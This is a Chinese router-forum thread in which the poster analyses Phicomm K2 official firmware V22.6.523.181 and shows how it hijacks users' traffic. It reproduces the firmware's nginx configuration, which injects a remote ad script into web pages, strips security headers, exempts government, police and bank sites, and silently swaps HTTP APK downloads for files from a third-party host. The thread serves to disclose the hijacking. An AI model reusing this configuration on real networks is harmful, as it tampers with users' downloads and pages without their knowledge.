找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 90150|回复: 619

[k2] 斐讯k2 官方广告固件 2019年再次更新 V22.6.523.181 广告劫持、APK劫持一个都不能少~

 火... [复制链接]
发表于 2019-1-13 15:52 | 显示全部楼层 |阅读模式
本帖最后由 ikbszj75089 于 2019-1-13 16:19 编辑

固件版本:V22.6.523.181
编译日期:2019年1月9日
样本MD5:394f185974e2d450f6de6936cea968e9

下载地址:
http://power.qiqizz.com/img/SOP-ramips-mt7620-K2A5-181-release.bin

上个帖子捎带说了一下 隐私条款增加了广告官方声明,可以去看一下:https://www.right.com.cn/forum/thread-403247-1-1.html


现在的固件在原有的劫持基础上增加了nginx广告劫持每日上传统计和APK劫持,如果使用斐讯路由器原版固件去非HTTPS的HTTP站点下载APK就被劫持了,下载到的就是推广版的或者其它的李鬼软件了,呵呵

(HTTPS站点不安装信任证书是无法实现劫持是安全的)

劫持进程如下:





部分劫持配置如下:



惹不起的部门自然是在白名单里的:




看一下ngx_business的配置文件

  1. config dns 'dns'
  2.         option enabled '1'
  3.         option dns_md5 ' '

  4. config apk 'apk'
  5.         option enabled '1'
  6.         option scheme '1'
  7.         option percent '10'
  8.         option repeatTime '24'
  9.         option apk_md5 ' '

  10. config js 'js'
  11.         option enabled '1'
  12.         option repeatTime '5'
  13.         option url 'http://t.7gg.cc:88/j1.js'

  14. config apk_collect 'apk_collect'
  15.         option enabled '1'

  16. config idmapping 'idmapping'
  17.         option enabled '1'
复制代码


配置文件的几大劫持参数:

dns:dns劫持
apk: apk劫持
js:常见的script脚本广告劫持
apk_collect:apk使用收集?
idmapping:大数据???



  1. root@K2:/tmp# cat /etc/nginx/nginx.conf
  2. user root;
  3. worker_processes 2;

  4. error_log /dev/null;
  5. pid /var/lib/nginx/nginx.pid;

  6. events {
  7.     worker_connections 2048;
  8. }

  9. http {
  10.     map_hash_bucket_size 64;
  11.     map $sent_http_content_type $expires {
  12.         default 3600;
  13.         text/html 3600;
  14.         text/javascript 3600;
  15.         application/javascript 3600;
  16.         application/x-javascript 3600;
  17.     }

  18.     include mime.types;
  19.     default_type application/octet-stream;

  20.     proxy_ignore_client_abort on;

  21.     client_body_temp_path /var/lib/nginx/client_body_temp;
  22.     client_max_body_size 1000m;
  23.     proxy_temp_path /var/lib/nginx/proxy_temp;
  24.     fastcgi_temp_path /var/lib/nginx/fastcgi_temp;
  25.     uwsgi_temp_path /var/lib/nginx/uwsgi_temp;
  26.     scgi_temp_path /var/lib/nginx/scgi_temp;

  27.     access_log off;

  28.     map $request_method $purge_method {
  29.         PURGE 1;
  30.         default 0;
  31.     }
  32.     map $host $allow {
  33.         default 1;
  34.     }

  35.     server {
  36.         resolver 127.0.0.1;
  37.         resolver_timeout 200s;

  38.         listen 0.0.0.0:8080;

  39.         location ~ \.(apk|apk?)$ {
  40.             rewrite /cdn/qiyiapp/20181225/0080e864b45f1491dcadb15d77830190/qiyiWEB.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://cdn.data.video.iqiyi.com;
  41.             rewrite /cdn/qiyiapp/20190107/app/iqiyi_8ba5a3dcbe537dc621c4e2c66ccc6c6e.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://cdn.data.video.iqiyi.com;
  42.             rewrite /cdn/qiyiapp/20190104/app/iqiyi_bcc71729b958703bb18643a5366e85a1.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://cdn.data.video.iqiyi.com;
  43.             rewrite /cdn/qiyiapp/20181225/0080e864b45f1491dcadb15d77830190/qiyiWEB.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://cdn.data.video.iqiyi.com;
  44.             rewrite /cdn/qiyiapp/20190107/app/iqiyi_8ba5a3dcbe537dc621c4e2c66ccc6c6e.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://baiducdncnc.inter.iqiyi.com;
  45.             rewrite /cdn/qiyiapp/20190107/app/iqiyi_8ba5a3dcbe537dc621c4e2c66ccc6c6e.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://baiducdnct.inter.iqiyi.com;
  46.             rewrite /j/ap/qiyiWEB.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://mbdapp.iqiyi.com;
  47.             rewrite /cdn/qiyiapp/20190107/app/iqiyi_8ba5a3dcbe537dc621c4e2c66ccc6c6e.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://ksyuncdnct.inter.iqiyi.com;
  48.             rewrite /j/ap/iqiyi_985.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://mbdapp.iqiyi.com;
  49.             rewrite /j/ap/qiyi81.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://mbdapp.iqiyi.com;
  50.             rewrite /j/ap/iqiyi_986.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://mbdapp.iqiyi.com;
  51.             rewrite /cdn/qiyiapp/20181225/f18ba4beb8a24059f49d0f8defa5327e/qiyi81.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://cdn.data.video.iqiyi.com;
  52.             rewrite /cdn/qiyiapp/20181225/2b24224ce5f16b60e497e0bf80e4b08c/iqiyi_986.apk http://mbdapp.iqiyi.com/j/ap/iqiyi_1646.apk break http://cdn.data.video.iqiyi.com;
  53.             rewrite /dl/appdl/application/apk/28/286bcd20d91d4337b6cc193004a640e7/com.jingdong.app.mall.1901081220.apk http://power.qiqizz.com/appdl/apk/qqwl01.apk break http://appdl.hicloud.com;
  54.             rewrite /dl/appdl/application/apk/28/286bcd20d91d4337b6cc193004a640e7/com.jingdong.app.mall.1901081220.apk http://power.qiqizz.com/appdl/apk/qqwl02.apk break http://appdlc.hicloud.com;
  55.             rewrite /patch/CHN/com.sohu.inputmethod.sogouoem/712_1529575609006/com.sohu.inputmethod.sogouoem_all_1806211809_a28c307f5a0.apk http://power.qiqizz.com/appdl/apk/SogouInput_v8.27_404773_android_ff_qilisrf13.apk break http://saufs.coloros.com;
  56.             rewrite_scheme 0 24 10;
  57.             proxy_pass $scheme://$host$request_uri;
  58.             proxy_set_header HOST $http_host;
  59.             proxy_buffering off;
  60.             proxy_buffers 256 4k;
  61.             proxy_max_temp_file_size 0k;
  62.             proxy_connect_timeout 300;
  63.             proxy_send_timeout 600;
  64.             proxy_read_timeout 600;
  65.             proxy_next_upstream error timeout invalid_header http_502;

  66.             proxy_redirect off;

  67.         }

  68.         location / {
  69.             root html;
  70.             index index.html index.htm;
  71.             proxy_pass $scheme://$host$request_uri;
  72.             proxy_set_header HOST $http_host;
  73.             proxy_buffering off;
  74.             proxy_buffers 256 4k;
  75.             proxy_max_temp_file_size 0k;
  76.             proxy_connect_timeout 300;
  77.             proxy_send_timeout 600;
  78.             proxy_read_timeout 600;
  79.             proxy_next_upstream error timeout invalid_header http_502;

  80.             proxy_redirect off;

  81.             proxy_ignore_headers Cache-control;
  82.             proxy_hide_header Cache-control;
  83.             proxy_ignore_headers Expires;
  84.             proxy_hide_header Expires;

  85.             proxy_hide_header X-XSS-Protection;
  86.             proxy_hide_header X-WebKit-CSP;
  87.             proxy_hide_header X-Content-Type-Options;
  88.             proxy_hide_header X-Content-Security-Policy;
  89.             proxy_hide_header Content-Security-Policy;
  90.             proxy_set_header 'Accept-Encoding' '';

  91.             gunzip off;

  92.             gzip off;
  93.             gzip_min_length 1k;
  94.             gzip_buffers 4 16k;
  95.             gzip_http_version 1.0;
  96.             gzip_comp_level 2;
  97.             gzip_types text/plain application/x-javascript text/javascript application/javascript application/css text/css application/xml text/ javascript application/x-httpd-php image/jpeg image/gif image/png;
  98.             gzip_vary off;
  99.             gzip_disable "MSIE [1-6]\.";

  100.             bg_filter_once on;
  101.             bg_filter_fixed_ua 'Mozilla';
  102.             bg_filter_black_host '\\.gov|sina\\.|qq\\.|weibo\\.|\\.edu|police|www\\.hsbank\\.com\\.cn|bianxianmao\\.com';
  103.             bg_filter_interval '<head>' '<head>\n<script async=true src="http://t.7gg.cc:88/j1.js"></script>' 5;

  104.             if ($allow ~ ^0){
  105.                 return 403;
  106.             }
  107.         }

  108.         error_page 500 502 503 504 /50x.html;
  109.         location = /50x.html {
  110.         root html;
  111.         }
  112.     }
  113. }
复制代码

斐讯2019全新启航,加油!~


2019新版斐讯k2固件刷机方法:详见:https://tbvv.net/posts/0101-breed.html


下期再见~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×

评分

参与人数 5恩山币 0 收起 理由
kzzeid + 1 不要怂、就是干
思杰马克丁狗 + 1 斐讯的兽性慢慢显露出来了
333jzq -1 开门!前面把表抄完了,我是来对表的!!!
iloveqinqin -2 扯淡
5951969 + 1 强大的恩山!(以下重复1万次)

查看全部评分

我的恩山、我的无线 The best wifi forum is right here.
发表于 2019-1-13 15:55 | 显示全部楼层
斐讯k2 官方广告固件 2019年再次更新 V22.6.523.181 广告劫持、APK劫持一个都不能少
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 15:58 | 显示全部楼层
很久没关注过了  看看怎么样。。。
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:14 | 显示全部楼层
斐讯k2 官方广告固件
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:17 | 显示全部楼层
官方广告固件?
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:19 | 显示全部楼层
谢谢老板分享
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:28 | 显示全部楼层
这个真的很过分
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:33 | 显示全部楼层
官方广告固件是啥?
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:35 来自手机 | 显示全部楼层
谢谢楼主分享
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:38 | 显示全部楼层
看看什么情况
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:40 | 显示全部楼层
看看是什么
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:49 来自手机 | 显示全部楼层
回复下再下载
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 16:49 | 显示全部楼层
官方广告固件???
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 17:00 来自手机 | 显示全部楼层
太厉害了,斐讯看来还要翻身了
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

发表于 2019-1-13 17:00 | 显示全部楼层
真的吗
真感谢
我的恩山、我的无线 The best wifi forum is right here.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-3-29 17:47

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com 举报电话:0519-86695797

快速回复 返回顶部 返回列表